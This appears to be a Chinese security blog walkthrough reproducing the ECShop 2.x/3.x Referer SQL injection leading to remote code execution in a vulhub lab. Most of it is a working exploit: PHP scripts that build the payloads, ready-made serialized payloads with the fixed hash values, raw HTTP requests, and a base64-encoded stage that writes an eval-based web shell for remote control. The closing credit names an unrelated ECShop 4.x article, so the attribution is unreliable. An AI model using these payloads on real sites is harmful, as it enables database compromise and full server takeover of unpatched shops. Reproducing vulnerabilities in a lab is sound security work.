启动靶场
在终端里进入事先进入准备好的vulhub靶场目录下,
cd vulhub-master/ecshop/xianzhi-2017-02-82239600
sudo docker-compose up -d
执行命令后
Ecshop2.x:
可在浏览器中输入http://ip:8080,正常访问即为靶场启动成功。
Ecshop3.x:
可在浏览器中输入http://ip:8081,正常访问即为靶场启动成功。
然后分别进行安装即可,数据库地址为mysql,用户名密码均为root
漏洞发现
漏洞成因
-
Referer值未做任何验证可被控制直接引用 -
采用_echash做分割,且为定值:2.x:554fcae493e564ee0dc75bdf2ebf94ca、3.x:45ea207d7a2b68c49582d2d22adf953a -
insert_ads函数的sql拼接不规范导致sql注入 -
make_val函数拼接字符串,拼接用户输入内容。
经由以上四个步骤即可造成远程代码执行,具体分析可参考文章
漏洞利用
手搓
知道原理后我们就开始利用漏洞了,环境如下:
靶机:192.168.75.146
攻击机:192.168.75.144
首先需要准备准备POC,代码如下:
<?php
$shell = bin2hex("{$asd'];phpinfot();//}xxx");
$id = "-1' UNION/*";
$arr = [
"num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
"id" => $id
];
$s = serialize($arr);
$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';
echo"POC for ECShop 2.x: n";
echo"{$hash2}ads|{$s}{$hash2}";
echo"nnPOC for ECShop 3.x: n";
echo"{$hash3}ads|{$s}{$hash3}";
?>
使用php执行上述代码,生成POC:
POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
Ecshop2.x POC利用:
在burp中抓包Ecshop用户登录页面,发送到重放器Repeater里,然后将请求信息替换成下方的POC:
GET /user.php HTTP/1.1
Host: [目标IP]
Referer: [生成的POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1
发送后即可得到如下结果,证明漏洞利用成功。
Ecshop3.x POC利用:
在burp中抓包Ecshop用户登录页面,发送到重放器Repeater里,然后将请求信息替换成下方的POC:
GET /user.php HTTP/1.1
Host: [目标IP]
Referer: [生成的POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1
发送后即可得到如下结果,证明漏洞利用成功。
Get WebShell
生成获取WebShell的POC,代码如下:
<?php
$shell = bin2hex("{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk='));//}xxx");
$id = "-1' UNION/*";
$arr = [
"num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
"id" => $id
];
$s = serialize($arr);
$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';
echo"POC for ECShop 2.x: n";
echo"{$hash2}ads|{$s}{$hash2}";
echo"nnPOC for ECShop 3.x: n";
echo"{$hash3}ads|{$s}{$hash3}";
?>
// 原型
file_put_contents('eval.php','')
// base64编码
ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk=
生成的Get WebShell Poc如下:
POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
套入POC利用,再用蚁剑即可连接,连接截图如下:
到此,Ecshop Sql注入、远程代码执行漏洞复现结束。
原文始发于微信公众号(0xh4ck3r):ECShop 4.x collection_list SQL注入
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论